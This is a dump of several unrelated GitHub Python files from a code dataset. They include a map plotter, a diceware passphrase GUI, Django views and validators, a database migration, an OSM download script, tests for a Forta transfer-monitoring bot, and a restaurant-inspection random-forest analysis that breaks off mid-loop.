np.array([[0,0]])}\n\n\n def summary(self):\n print(\"L2ExplorerMap:\")\n print(\" id = \", self.map_id)\n print(\" xlimits = {0}, ylimits ={1}\".format(self.xlim, self.ylim))\n print(\" polygons = \", len(self.polygons))\n print(\" objects:\")\n for (obj_type, locs) in self.obj_locs.items():\n print(\" {0} x {1}\".format(obj_type, len(locs)))\n\n\n def plot(self, to_show=('map')):\n if 'grid' in to_show:\n fig1 = plt.figure()\n self.occgrid.show(plt.axes(label=\"occgrid\"))\n if 'map' in to_show:\n fig2 = plt.figure()\n ax2 = plt.axes()\n ax2.set_xlim(*self.xlim)\n ax2.set_ylim(*self.ylim)\n for poly in self.polygons:\n poly.plot(ax=ax2)\n plots = {}\n for (obj_type, locs) in self.obj_locs.items():\n if obj_type is not None:\n plots[obj_type] = ax2.scatter(locs[:,0], locs[:,1])\n ax2.legend(list(plots.values()), list(plots.keys()), loc='upper right')\n plt.show()\n\n\n def add_objects(self, obj_class:str, locations:np.ndarray):\n if obj_class in self.obj_locs:\n self.obj_locs[obj_class] = np.append(self.obj_locs[obj_class], locations, axis=0)\n else:\n self.obj_locs[obj_class] = locations\n print(\"Adding {0} points for '{1}'\".format(len(locations), obj_class))\n\n def get_objects_by_class(self, obj_class:str):\n return self.obj_locs.get(obj_class, None)\n\n def get_object_classes(self):\n lst = list(self.obj_locs.keys()) \n lst.remove(None) # remove the 'None' key\n return lst\n\n","repo_name":"lifelong-learning-systems/l2explorer","sub_path":"l2explorer/l2procgen/l2explorer_map.py","file_name":"l2explorer_map.py","file_ext":"py","file_size_in_byte":2347,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"31"} +{"seq_id":"34661293585","text":"'''\nA015 Number of Verifications\nProblem : https://www.acmicpc.net/problem/2475\nDate : 20220905\n'''\n\nnumber = input().split(' ')\nsum = 0\nfor i in number:\n sum = sum + int(i) * int(i)\nspec = sum % 10\nprint(spec)\n","repo_name":"tpwpfrnl/ProblemSolving","sub_path":"a015.py","file_name":"a015.py","file_ext":"py","file_size_in_byte":214,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"6073756972","text":"#! /usr/bin/python\n\nfrom PyQt5 import QtCore, QtGui, QtWidgets, uic\ntry:\n from crypto.Random import random\nexcept:\n from Crypto.Random import random\nimport pickle\nimport sys\nfrom math import log, ceil\nimport pkg_resources\n\ndef leepalabras():\n f = open('palabras.txt')\n dic = {}\n for l in f:\n if ':' in l:\n palabra = l[:-2]\n dic[palabra]=[]\n else:\n dic[palabra].append(l[:-1])\n return dic\n\n\nclass Programa(QtWidgets.QDialog):\n def __init__(self, parent = None):\n QtWidgets.QDialog.__init__(self)\n self.ui = uic.loadUi(\"generapass.ui\")\n self.ui.show()\n\n def genera(self, *args):\n bits = int(self.ui.spinBox.value())\n keyword = str(self.ui.lineEdit.text())\n bitsusados = 0\n length = int(self.ui.spinBox_2.value())\n self.ui.textBrowser.clear()\n if keyword:\n bits_disponibles = [log(len(dic[a]),2) for a in keyword]\n totalbits = sum(bits_disponibles)\n for letra in keyword.lower():\n b = bits_disponibles.pop(0)\n aelegir = int(ceil(2**(bits*b/totalbits)))\n palabras = dic[letra][:aelegir]\n n = random.choice(palabras)\n self.ui.textBrowser.insertPlainText(n+'\\n')\n bitsusados += log(len(palabras),2)\n else:\n aelegir = int(ceil(2**(float(bits)/length)))\n palabras = dic['all'][:aelegir]\n for i in range(length):\n n = random.choice(palabras)\n self.ui.textBrowser.insertPlainText(n+'\\n')\n bitsusados += log(len(palabras),2)\n self.ui.statusbar.showMessage('bits de entropia: ' + str(bitsusados))\n\n\n\nif __name__ == \"__main__\":\n dic = leepalabras()\n app = QtWidgets.QApplication(sys.argv)\n window = Programa()\n window.ui.pushButton.clicked.connect(window.genera)\n sys.exit(app.exec_())\n","repo_name":"miguelmarco/pydiceware-es","sub_path":"gui/generapass.py","file_name":"generapass.py","file_ext":"py","file_size_in_byte":1937,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"74906690007","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[17]:\n\n\ndef plane_point(plane,point):\n #draw plane\n #draw two point\n #print distance\n plane_normal=[plane[0],plane[1],plane[2]]\n d=my_product(plane_normal,point)/my_length_function(plane_normal)\n\n t= plane[3]-(my_product(plane_normal,point))\n t=t/my_product(plane_normal,plane_normal)\n p_0=[0,0,0]\n p_0[0]=point[0]+t*plane[0]\n p_0[1]=point[1]+t*plane[1]\n p_0[2]=point[2]+t*plane[2]\n \n return d,t,p_0\n #p_o=\n #plane,point,p_0\n\n\n# In[18]:\n\n\nplane_1=[1,2,3,-6]\npoint_1=[4,2,10]\nplane_point(plane_1,point_1)\n\n\n# In[6]:\n\n\ndef my_product(a,b):\n return a[0]*b[0]+a[1]*b[1]+a[2]*b[2]\n\ndef my_length_function(a):\n return my_product(a,a)**0.5\n\n\n# In[7]:\n\n\na=[1,2,3]\nb=[4,5,6]\nmy_product(a,b),my_length_function(a),my_length_function(b)\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"gamzegulyol/computational_geometry","sub_path":"lab4.py","file_name":"lab4.py","file_ext":"py","file_size_in_byte":835,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"10914925754","text":"\"\"\"empty message\n\nRevision ID: bf80b8120448\nRevises: \nCreate Date: 2020-07-04 21:27:41.059812\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'bf80b8120448'\ndown_revision = None\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('customer',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('name', sa.String(), nullable=True),\n sa.Column('city', sa.String(), nullable=True),\n sa.Column('email', sa.String(), nullable=True),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table('merchant',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('name', sa.String(), nullable=True),\n sa.Column('city', sa.String(), nullable=True),\n sa.Column('email', sa.String(), nullable=True),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table('order',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('customer_id', sa.Integer(), nullable=False),\n sa.Column('merchant_id', sa.Integer(), nullable=False),\n sa.ForeignKeyConstraint(['customer_id'], ['customer.id'], ),\n sa.ForeignKeyConstraint(['merchant_id'], ['merchant.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_table('order')\n op.drop_table('merchant')\n op.drop_table('customer')\n # ### end Alembic commands ###\n","repo_name":"gururajks/pickup_backend","sub_path":"migrations/versions/bf80b8120448_.py","file_name":"bf80b8120448_.py","file_ext":"py","file_size_in_byte":1524,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"73789378648","text":"with CQCConnection(\"Alice\") as Alice:\n qubits = [None] * N\n for i in range(bits):\n qubits[i] = qubit(Alice)\n\n # Encode value\n if bits[i] == 1:\n qubits[i].Z()\n\n # Change basis\n if bases[i] == 1:\n qubits[i].H()\n","repo_name":"aThorp96/undergraduate_thesis","sub_path":"code/encoding_example.py","file_name":"encoding_example.py","file_ext":"py","file_size_in_byte":272,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"14909131906","text":"from django.shortcuts import render, redirect\nfrom .models import Task\nfrom .forms import TaskForm\n\n\ndef index(request):\n template = 'todo/index.html'\n tasks = Task.objects.all()\n form = TaskForm()\n\n if request.method == 'POST':\n\n form = TaskForm(request.POST)\n if form.is_valid():\n form.save()\n return redirect('/')\n\n context = {\n 'tasks': tasks,\n 'task_form': TaskForm,\n }\n return render(request, template_name=template, context=context)\n\n\ndef update(request, pk):\n template = 'todo/update.html'\n task = Task.objects.get(id=pk)\n form = TaskForm(instance=task)\n\n if request.method == 'POST':\n form = TaskForm(request.POST, instance=task)\n if form.is_valid():\n form.save()\n return redirect('/')\n context = {\n 'task': task,\n 'task_form': form,\n }\n return render(request, template_name=template, context=context)\n\n\ndef delete(request, pk):\n template = 'todo/delete.html'\n\n task = Task.objects.get(id=pk)\n if request.method == 'POST':\n if 'delete_task' in request.POST:\n task.delete()\n return redirect('/')\n\n if 'cancel_task' in request.POST:\n return redirect('/')\n context = {\n 'task': task,\n }\n\n return render(request, template_name=template, context=context)\n","repo_name":"omolojakazeem/todoappV1","sub_path":"todo/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1369,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"40946244642","text":"while True:\n try:\n print('0이 아닌 정수를 입력해주세요 ', end='')\n n = int(input())\n result = 1/n\n # print(1 / n)\n # break\n except ZeroDivisionError:\n print('0 으로는 나눌 수 없습니다!! 다시 입력해 주세요!!!')\n except ValueError:\n print('정수 입력하라니깐 왜 문자 입력하냐???')\n else:\n print(result)\n break\n","repo_name":"SooDevv/Algorithm_Training","sub_path":"Review/test/try01.py","file_name":"try01.py","file_ext":"py","file_size_in_byte":427,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"74426620568","text":"from django.core.exceptions import ValidationError\nimport validators\nfrom pessoal_quadro.models import Agente, Pessoa, Nomiacao_Cargo, Baixa, Reforma\nfrom formacao.models import Selecionado_formacao, Formacao_conclusao\nfrom transferencia.models import Transferencia, Troca\nfrom django.contrib import messages\nimport sweetify\nimport re\nfrom django.contrib.auth.decorators import login_required\nimport header\nfrom django.contrib.auth import authenticate, login, logout\nfrom django.shortcuts import render\nfrom django.http import HttpResponseRedirect, Http404, HttpResponse\n\n\ndef verficarAcessoAdmin(request):\n if request.user.email != '5':\n return True\n\n\ndef verficarAcessoAdminGestor(request):\n if request.user.email != '5' and request.user.email != '4':\n return True\n\n\ndef verficarAcessoPessoalQuadro(request):\n if request.user.email != '5' and request.user.email != '4' and request.user.email != '1':\n return True\n\n\ndef verficarAcessoFormacao(request):\n if request.user.email != '5' and request.user.email != '4' and request.user.email != '2':\n return True\n\n\ndef verficarAcessoTransferencia(request):\n if request.user.email != '5' and request.user.email != '4' and request.user.email != '3':\n return True\n\n\ndef validar_baixa(request):\n try:\n bix = header.views_core.retorna_numero_agente(request.POST['bi'])\n bx = Baixa.objects.get(agente_id=bix)\n if bx.motivo_baixa == 'Reforma' or bx.motivo_baixa == 'Falecimento':\n #messages.warning(request,\" Não pode! ja existe uma baixa com as mesma carateristica..\")\n foto = str(bx.agente.foto_fardado)\n sweetify.error(request, 'Não pode! ja existe uma baixa com as mesma carateristica!...',\n imageUrl='../static/asset/img/user.jpg', persistent='Ok', timer='4000')\n return False\n else:\n return True\n except Exception as e:\n return True\n\n\ndef validar_reforma_anticipada(request):\n try:\n bix = header.views_core.retorna_numero_agente(request.POST['bi'])\n ref = Reforma.objects.get(agente_id=bix)\n if ref.reforma == 'Anticipada':\n messages.warning(request, \" Não pode! ja existe na reforma..\")\n return False\n else:\n return True\n except Exception as e:\n try:\n bai = Baixa.objects.get(agente_id=bix)\n if bai.motivo_baixa == 'Falecimento':\n messages.warning(\n request, \" O agente é falecido, não pode ser adicionado..\")\n return False\n elif bix > 0:\n return True\n else:\n return False\n except Exception as e:\n if bix > 0:\n return True\n else:\n messages.warning(request, \" O Nip ou o Nº BI não é valido..\")\n return False\n\n\ndef validar_pedido_transferencia(request):\n try:\n bi = request.POST['bi']\n bix = header.views_core.retorna_numero_agente(bi)\n bis = Transferencia.objects.get(agente_id=bix)\n if bis.id is not None:\n messages.warning(\n \"Ja existe uma transferencia a espera com esses dados....\")\n return False\n except Transferencia.DoesNotExist:\n return True\n\n\ndef validar_selecionar_formacao(request):\n bi = request.POST['bi']\n id = header.views_core.retorna_numero_agente(bi)\n try:\n seleciona = Selecionado_formacao.objects.get(agente_id=id)\n if seleciona.id is not None:\n #messages.warning(request, 'O agente ja existe na lista selecionado para uma formação, Para continuar deve remover da lista ...')\n sweetify.error(\n request, 'O agente ja existe na lista, selecionado para uma formação, para continua deve ser removido da lista....', persistent='Ok', timer='6000')\n return False\n except Selecionado_formacao.DoesNotExist:\n return True\n\n\ndef verficar_falecimento(request, value=None):\n try:\n baixa = Baixa.objects.get(agente_id=value)\n if baixa.motivo_baixa == 'Falecimento':\n messages.warning(\n request, 'Não pode adicionar o agente; O agente ja é falecido')\n return False\n else:\n return True\n except Baixa.DoesNotExist:\n return True\n\n\ndef validar_conclusao_formacao(request):\n bi = request.POST['bi']\n #pessoa = Pessoa.objects.get(bi=bi.upper())\n agente = header.views_core.retorna_numero_agente(bi)\n try:\n seleciona = Selecionado_formacao.objects.get(agente_id=agente)\n if seleciona.id is not None:\n return True\n except Selecionado_formacao.DoesNotExist:\n messages.warning(\n request, 'O agente não existe na lista dos selecionados, não pode ser adicionado a conclusão da formação ...')\n return False\n\n\ndef validar_data_nascimento_igresso_colocacao(request):\n nascimento = request.POST['data_nascimento']\n igresso = request.POST['data_igresso']\n colocacao = request.POST['data_colocacao']\n nascimento = nascimento.split(\"-\")\n igresso = igresso.split(\"-\")\n colocacao = colocacao.split(\"-\")\n igress = int(igresso[0]) - int(nascimento[0])\n if nascimento[0] > igresso[0] or nascimento[0] > colocacao[0]:\n messages.warning(\n request, ' O ano de nascimento não poder ser maior que ano de igresso, nem ano de Colocação....')\n return False\n elif igresso[0] > colocacao[0] or igress < 18:\n messages.warning(\n request, ' a data de igresso não é valida pelo ano de Colocação....')\n return False\n elif igress < 18:\n messages.warning(\n request, ' A data de igresso diz que vc é menor de idade, na data de nascimento....')\n return False\n else:\n return True\n\n\ndef verficar_bi_numero_agente(request):\n try:\n bi = request.POST['bi_id']\n numero_agente = request.POST['numero_agente_id']\n pessoa = Pessoa.objects.get(bi=bi)\n if pessoa.bi is not None:\n agente = Agente.objects.get(numero_agente=numero_agente)\n if agente.pessoa_id == pessoa.id:\n return True\n else:\n messages.warning(\n request, ' O Bi e o numero de agente não pertence a mesma pessoa...')\n return False\n except Pessoa.DoesNotExist:\n messages.warning(\n request, ' Não existe agente com esse numero de bi e numero de agente...')\n return False\n\n\n# FUNÇÃO QUE VALIDA SE O BI EXISTE E RETORNA ERRO SE EXISTIR CASO CONTRAIO TRUE\ndef consultar_bi(value):\n try:\n bi = Pessoa.objects.get(bi=value.upper())\n if bi.bi is not None:\n raise ValidationError(\n \"Ja existe agente com esse numero de bi no sistema \")\n # return False\n except Pessoa.DoesNotExist:\n return True\n\n\n# FUNÇÃO QUE VALIDA SE O BI OU NIP SE EXISTE E RETORNA TRUE SE EXISTE , CASO CONTRARIO ERRO\ndef consultar_bi_existe(value):\n try:\n bis = Pessoa.objects.get(bi=value.upper())\n if bis.bi is not None:\n return True\n except Pessoa.DoesNotExist:\n try:\n agente = Agente.objects.get(nip=value)\n if agente.nip is not None:\n return True\n except Agente.DoesNotExist:\n try:\n b = Pessoa.objects.filter(bi=value.upper())\n if b is not None:\n return True\n except Pessoa.DoesNotExist:\n try:\n agente = Agente.objects.filter(nip=value)\n if len(agente) > 0:\n return True\n except Agente.DoesNotExist:\n raise ValidationError(\n \"Numero do Nip ou Bi, Não existe....\")\n\n\ndef consultar_bi_True_False(value):\n try:\n bis = Pessoa.objects.get(bi=value.upper())\n if bis.bi is not None:\n return (True, bis.data_nascimento)\n except Pessoa.DoesNotExist:\n return (False, None)\n\n\n# @login_required\ndef consultar_numero_agente(value):\n try:\n ng = Agente.objects.get(numero_agente=value)\n except Agente.DoesNotExist:\n raise ValidationError(\n \" Não existe agente com esse numero no sistema.!\")\n\n\n# @login_required\ndef validar_comprimento_4(value):\n if value is None or len(value) < 4:\n raise ValidationError(\n ('Não é valido, informa um nome valido'),\n code='invalid',\n )\n\n\n# @login_required\ndef validar_email(value):\n if not validators.email(value):\n raise ValidationError(\n ('Não é valido, informa um email valido'),\n code='invalid',\n )\n\n\n# função que esta validar o BI e o nip do agente\ndef validar_bi(value):\n try:\n numero = 0\n letra = 0\n xl = 0\n prog = re.compile(\".\")\n bi = re.findall(prog, value)\n if len(value) == 14:\n while xl < len(bi):\n if bi[xl].isdigit():\n numero = numero + 1\n else:\n letra = letra + 1\n xl = xl + 1\n nove = bi[9]\n deze = bi[10]\n if len(bi) != 14 or letra != 2 or numero != 12:\n raise ValidationError(\n ('O numero do Bi não é valido, são 14 digtos incluindo 2 letra '),\n )\n elif not nove.isalpha() or not deze.isalpha():\n raise ValidationError(\n ('O numero do Bi não é valido, são 14 digtos incluindo 2 letra '),\n )\n else:\n while xl < len(bi):\n if bi[xl].isdigit():\n numero += numero\n else:\n if len(value) > 2 and len(value) < 9:\n x = 0\n else:\n raise ValidationError(\n ('O numero de indentificação não é valido..'),\n )\n break\n xl = xl + 1\n except IndexError:\n raise ValidationError(\n ('O numero do Bi não é valido.! erro'),\n )\n\n\ndef validar_comprimento_3(value):\n if len(value) < 3:\n raise ValidationError(\n 'Não é valido, o tamanho é muito curto'\n )\n\n\ndef validar_numeros(value):\n if not value.isnumeric():\n raise ValidationError(\n 'Não é valido, digita numeros validos'\n )\n\n\ndef validar_string(value):\n sf = value.join(\" \")\n if value.isdigit():\n raise ValidationError(\n 'Não é valido, digita apenas letras'\n )\n\n\n# VALIDAR CAIXA SOCIAL\ndef validar_numero_caixa_social(value):\n try:\n valor = Agente.objects.get(numero_caixa_social=value)\n if valor.numero_caixa_social is not None:\n raise ValidationError(\" o numero da caixa social ja existe\")\n except Agente.DoesNotExist:\n return True\n\n\n# VALIDAR O REGISTO DE NOMIAÇÃO\ndef verficar_id_nomiacao(request):\n try:\n bi = request.POST['bi']\n pessoa = Pessoa.objects.get(bi=bi)\n if pessoa.id is not None:\n nomi = Nomiacao_Cargo.objects.get(agente_id=pessoa.id)\n if nomi.id is not None:\n #messages.warning(request, 'Ja existe uma nomiação no sistema deste agente!.. Apenas actualiza ou elimina o registo...')\n return (False, nomi)\n else:\n return (True, None)\n except Exception as e:\n try:\n agente = Agente.objects.get(nip=bi)\n if agente.agente_id is not None:\n nomi = Nomiacao_Cargo.objects.get(agente_id=agente.id)\n if nomi.id is not None:\n return (False, nomi)\n else:\n return (True, None)\n except Exception as e:\n return (True, None)\n","repo_name":"ismaely/sigrh_cpl","sub_path":"header/validators.py","file_name":"validators.py","file_ext":"py","file_size_in_byte":11998,"program_lang":"python","lang":"pt","doc_type":"code","stars":3,"dataset":"github-code","pt":"31"} +{"seq_id":"28971714936","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"Clone all gists of GitHub username given on the command line.\"\"\"\n\nimport subprocess\nimport sys\nimport requests\n\nif len(sys.argv) > 1:\n gh_user = sys.argv[1]\nelse:\n print(\"Usage: clone-gists.py NateWeiler\")\n sys.exit(1)\n\nreq = requests.get('https://api.github.com/users/%s/gists' % gh_user)\n\nfor gist in req.json():\n ret = subprocess.call(['git', 'clone', gist['git_pull_url']])\n if ret != 0:\n print(\"ERROR cloning gist %s. Please check output.\" % gist['id'])\n","repo_name":"NateWeiler/Resources","sub_path":"Python/Skeleton/venv/clone-all-gists.py","file_name":"clone-all-gists.py","file_ext":"py","file_size_in_byte":530,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"13594537062","text":"from inspect import Parameter\nfrom webbrowser import get\nfrom subprocess import call\nfrom numpy import empty, full, mat\nimport requests\nimport re\n\n# this method gives back the newest URL for the changeset .osm files and the latest .osm number\ndef Choose_area():\n\n # search URL pieces until .osm files are found.\n URL = \"http://download.openstreetmap.fr/replication\"\n waarde = True\n while(waarde):\n page = requests.get(URL)\n regex = \"\"\"href=\"([a-z]\\S+|\\d+)\\/\".\"\"\"\n match = re.findall(regex, page.text)\n\n if(len(match) == 0):\n print(\"choose .osm file\")\n break\n\n print(\"Choose between: \", match)\n paramater = input(\"choose first parameter: \")\n\n while not paramater in match:\n print(len(match))\n print(\"parameter nog in list... try again\")\n paramater = input(\"choose first parameter: \")\n \n URL_new = URL + \"/\" + paramater\n print(URL_new)\n URL = URL_new\n\n # select .osm file\n page = requests.get(URL)\n regex = \"\"\"href=\"(\\d{3}.osc.gz)\"\"\"\n match = re.findall(regex, page.text)\n print(match)\n\n print(\"Choose between: \", match)\n paramater = input(\"choose first parameter: \")\n\n while not paramater in match:\n print(len(match))\n print(\"parameter nog in list... try again\")\n paramater = input(\"choose first parameter: \")\n\n full_url = URL + \"/\" + paramater\n print(full_url)\n file_name = paramater\n return full_url, file_name\n\n\ndef download_area_osm_file():\n url, file_name = Choose_area()\n print(url, file_name)\n call([\"wget\", url]) # download latest .osm file\n call([\"gunzip\", file_name]) # extract latest .osm file\n \n\ndownload_area_osm_file()\n\n\n\n\n","repo_name":"BenoitLan/copy_linked_data","sub_path":"Choose_area.py","file_name":"Choose_area.py","file_ext":"py","file_size_in_byte":1752,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"36726239805","text":"import timeit\nimport agent\nfrom web3 import Web3\nfrom web3_mock import Web3Mock, ADDRESS_WITH_LARGE_BALANCE, ADDRESS_WITHOUT_LARGE_BALANCE, CURRENT_BLOCK, OLDER_CURRENT_BLOCK\nfrom forta_agent import create_transaction_event, FindingSeverity, get_json_rpc_url, EntityType\nfrom src.constants import SWAP_TOPICS\n\nw3 = Web3Mock()\nreal_w3 = Web3(Web3.HTTPProvider(get_json_rpc_url()))\n\n\nclass TestLargeTransferOut:\n\n def test_large_transfer_no_alert(self):\n agent.initialize()\n\n tx_event = create_transaction_event({\n 'transaction': {\n 'hash': \"0\",\n 'to': \"0x1c5dCdd006EA78a7E4783f9e6021C32935a10fb4\",\n 'from': ADDRESS_WITH_LARGE_BALANCE,\n 'value': \"50000000000000000000\"\n },\n 'block': {\n 'number': CURRENT_BLOCK\n },\n 'receipt': {\n 'logs': []}\n })\n\n findings = agent.detect_suspicious_native_transfers(w3, tx_event)\n assert len(\n findings) == 0, \"this should have not triggered a finding as the account had assets 1 day ago\"\n\n def test_preformance(self):\n agent.initialize()\n\n global real_w3\n tx = real_w3.eth.get_transaction(\n '0x39ed9312dabfe228ab03659192540da18b97f89eb7b89abaa9a6da03011e9668')\n\n global large_transfer_tx_event\n large_transfer_tx_event = create_transaction_event({\n 'transaction': {\n 'hash': tx.hash,\n 'to': tx.to,\n 'from': tx['from'],\n 'value': tx.value\n },\n 'block': {\n 'number': tx.blockNumber\n },\n 'receipt': {\n 'logs': []}\n })\n\n tx = real_w3.eth.get_transaction(\n '0xc8a4877b4b3ed9e1cbd22bcbd8d6f6e78b8d70e96475dfa4a4b9751bf0c08a29')\n global small_transfer_tx_event\n small_transfer_tx_event = create_transaction_event({\n 'transaction': {\n 'hash': tx.hash,\n 'to': tx.to,\n 'from': tx['from'],\n 'value': tx.value\n },\n 'block': {\n 'number': tx.blockNumber\n },\n 'receipt': {\n 'logs': []}\n })\n\n # Chain: Blocktime, Number of Tx -> Avg processing time in ms target\n # Ethereum: 12s, 150 -> 80ms\n # BSC: 3s, 70 -> 43ms\n # Polygon: 2s, 50 -> 40ms\n # Avalanche: 2s, 5 -> 400ms\n # Arbitrum: 1s, 5 -> 200ms\n # Optimism: 24s, 150 -> 160ms\n # Fantom: 1s, 5 -> 200ms\n\n # we're assuming 10% of tx will contain a large transfer\n # so our target for polygon is 5 tx with a large transfer and 45 without large transfers\n\n processing_runs = 10\n processing_time_large_transfers_avg_ms = timeit.timeit(\n 'agent.detect_suspicious_native_transfers(real_w3, large_transfer_tx_event)', number=processing_runs, globals=globals()) * 1000 / processing_runs\n\n processing_time_small_transfers_ms = timeit.timeit(\n 'agent.detect_suspicious_native_transfers(real_w3, small_transfer_tx_event)', number=processing_runs, globals=globals()) * 1000 / processing_runs\n assert (processing_time_large_transfers_avg_ms * 0.05 + processing_time_small_transfers_ms * 0.95) / \\\n 2 < 40, \"processing time should be less than 43ms. If not, this bot is unlikely to keep up with fast chains, like Polygon\"\n\n def test_gera_coin_attacker(self):\n agent.initialize()\n\n tx = real_w3.eth.get_transaction(\n '0x39ed9312dabfe228ab03659192540da18b97f89eb7b89abaa9a6da03011e9668')\n\n tx_event = create_transaction_event({\n 'transaction': {\n 'hash': tx.hash,\n 'to': tx.to,\n 'from': tx['from'],\n 'value': tx.value\n },\n 'block': {\n 'number': tx.blockNumber\n },\n 'receipt': {\n 'logs': []}\n })\n\n findings = agent.detect_suspicious_native_transfers(real_w3, tx_event)\n assert len(\n findings) == 1, \"the gera coin attacker tx should have been detected\"\n\n def test_large_transfer_alert(self, mocker):\n agent.initialize()\n tx_event = create_transaction_event({\n 'transaction': {\n 'hash': \"0\",\n 'to': \"0x1c5dCdd006EA78a7E4783f9e6021C32935a10fb4\",\n 'from': ADDRESS_WITHOUT_LARGE_BALANCE,\n 'value': \"50000000000000000000\"\n },\n 'block': {\n 'number': CURRENT_BLOCK\n },\n 'receipt': {\n 'logs': []}\n })\n\n findings = agent.detect_suspicious_native_transfers(w3, tx_event)\n assert len(\n findings) == 1, \"this should have triggered a finding as account obtained assets within the last day\"\n\n assert findings[0].labels[0].toDict(\n )[\"entity\"] == ADDRESS_WITHOUT_LARGE_BALANCE, \"should have EOA address as label\"\n assert findings[0].labels[0].toDict(\n )[\"entity_type\"] == EntityType.Address, \"should have label_type address\"\n assert findings[0].labels[0].toDict(\n )[\"label\"] == 'attacker', \"should have attacker as label\"\n assert findings[0].labels[0].toDict(\n )[\"confidence\"] == 0.3, \"should have 0.3 as label confidence\"\n\n def test_swaps(self, mocker):\n agent.initialize()\n tx_event = create_transaction_event({\n 'transaction': {\n 'hash': \"0\",\n 'to': \"0x1c5dCdd006EA78a7E4783f9e6021C32935a10fb4\",\n 'from': ADDRESS_WITHOUT_LARGE_BALANCE,\n 'value': \"50000000000000000000\"\n },\n 'block': {\n 'number': CURRENT_BLOCK\n },\n 'logs': [\n {\n 'topics': [SWAP_TOPICS[0]],\n }\n ],\n 'receipt': {\n 'logs': []}\n })\n\n findings = agent.detect_suspicious_native_transfers(w3, tx_event)\n assert len(\n findings) == 0, \"this should not have triggered a finding as transaction is a swap\"\n","repo_name":"forta-network/starter-kits","sub_path":"large-transfer-out-py/src/agent_test.py","file_name":"agent_test.py","file_ext":"py","file_size_in_byte":6238,"program_lang":"python","lang":"en","doc_type":"code","stars":50,"dataset":"github-code","pt":"31"} +{"seq_id":"13058974202","text":"from __future__ import division\nfrom matplotlib.backends.backend_pdf import PdfPages\nimport os\nfrom sklearn.model_selection import KFold\nimport re, ast\nimport platform\nimport sklearn.cross_validation\nimport matplotlib.pyplot as plt\n\nexecfile('../../functions/python_libraries.py')\nexecfile('../../functions/simulation_functions.py')\n\n\n## This dataframe is instances_mergerd_seattle.csv from Kang et al. 2013 with additional\n## features created in KC.R.\ndta = pd.read_csv('../../../data/KangData_with_additional_features.csv')\n\n## set -1 scores to 0\ndta.inspection_penalty_score[dta.inspection_penalty_score==-1]=0\ndta.inspection_average_prev_penalty_scores[dta.inspection_average_prev_penalty_scores==-1]=0\ndta.inspection_prev_penalty_score[dta.inspection_prev_penalty_score==-1]=0\n\n\nfeatures = ['inspection_average_prev_penalty_scores', 'inspection_prev_penalty_score', # SAP\n 'inspection_penalty_score', # y\n 'asian', # SUP\n 'poison', 'vomit','diarrhea', 'sick2', # CP\n 'review_count', 'average_review_rating', 'non_positive_review_count'] # CP\n\n\n\n\nny_df_subset = dta[features]\n\n\n## Rename Columns\nny_df_subset.columns = ['inspection_average_prev_penalty_scores_SAP', 'inspection_prev_penalty_score_SAP',\n 'y',\n 'asian_SUP',\n 'poison_CP', 'vomit_CP','diarrhea_CP', 'sick_CP',\n 'review_count_SAP', 'average_review_rating_SAP', 'non_positive_review_count_SAP']\n\n\n## Get SAP and CP columns\nSAP_cols = [s for s in np.array(ny_df_subset.columns) if \"SAP\" in s]\nCP_cols = [s for s in np.array(ny_df_subset.columns) if \"CP\" in s]\n\n\n\nk_fold = sklearn.cross_validation.ShuffleSplit(len(ny_df_subset.y), n_iter=50,\n test_size=0.2)\n\n## DT Results\nfull_model = []\nfull_rmse = []\nfull_train_rmse = []\nfull_model_without_CP = []\nfull_rmse_without_CP = []\nfull_train_rmse_without_CP = []\n\n\n\n\n## OLS Results\nfull_rmse_OLS = []\nfull_train_rmse_OLS = []\nfull_rmse_OLS_without_CP = []\nfull_train_rmse_OLS_without_CP = []\n\n\n\n\nfor k, (train, test) in enumerate(k_fold):\n print( 'iteration #', k)\n df_subset_train = ny_df_subset.iloc[train,:]\n df_subset_test = ny_df_subset.iloc[test,:]\n \n \n ## Hyperparamter Search set-up for RF\n clf = sklearn.ensemble.RandomForestRegressor()\n max_depth = [3, 5, 10]\n max_depth.append(None)\n min_samples_leaf = [5, 10, 20, 50, 100]\n min_samples_split = [2, 3, 4, 5, 10]\n n_estimators = [50, 100, 150]\n max_features = ['auto', 0.25, 0.5, 0.75]\n random_grid = {'max_depth': max_depth,\n 'min_samples_leaf': min_samples_leaf,\n 'max_features': max_features,\n 'n_estimators': n_estimators,\n 'min_samples_split': min_samples_split}\n\n model = GridSearchCV(estimator = clf,\n param_grid = random_grid,\n cv = 3, verbose=0,\n n_jobs = -1)\n\n\n \n ## Full\n model.fit(df_subset_train[sum([SAP_cols, CP_cols, ['asian_SUP']], [])], \n df_subset_train.y)\n y_predict_full = model.predict(df_subset_test[sum([SAP_cols, CP_cols, ['asian_SUP']], [])])\n 